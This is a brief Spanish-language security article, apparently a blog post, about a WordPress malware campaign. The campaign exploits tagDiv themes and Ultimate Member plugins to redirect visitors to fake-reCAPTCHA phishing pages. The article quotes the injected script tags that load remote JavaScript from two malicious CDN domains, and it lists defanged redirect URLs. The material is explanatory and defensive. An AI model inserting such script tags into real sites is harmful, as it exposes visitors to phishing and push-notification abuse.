Cada día los casos de infección en WordPress que redirecciona a los visitantes a páginas sospechosas está siendo algo muy común y preocupante. Recientemente, fue descubierta una vulnerabilidad en temas de tagDiv y Plugins de Ultimate Member. En este tipo hackeo WordPress, los visitantes de su página web son redirigidos a páginas phishing o maliciosas.

hxxp utroro.com/xyz  or 

hxxp://murieh.abc/xyz or

hxxps://unverf.com/xyz

En este hack, los usuarios, cuando se redirige, acaban en urls abusivas con imágenes reCAPTCHA suplantada (pishing). El texto intenta engañar a los visitantes para permitir notificaciones push del navegador.

Por otra parte, Google penaliza a los sitios web que estén en listas negras como sito web phising o hackeados. Los navegadores web mostrarán un mensaje de advertencia a los visitantes cuando visitan su web.

Código malicioso inyectados

El código inyectado en los ficheros php hace referencia a dos sitios

cdn.allyouwant.online. and cdn.eeduelements.com.

El primero fue usando en las últimas infecciones y el segundo desde el comienzo del uso de este tipo de ataque.

 

... <script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
<script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head> ...

En el momento de escribir esta articulo, hay como unos  3900 sitios web con el script de cdn.eeduelements[.]com y más de 6800 con el script de cdn.allyouwant[.]online.